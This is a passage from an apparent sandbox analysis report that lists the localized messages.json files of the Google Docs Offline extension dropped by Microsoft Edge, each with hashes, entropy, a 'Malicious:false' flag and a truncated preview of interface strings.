                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):936
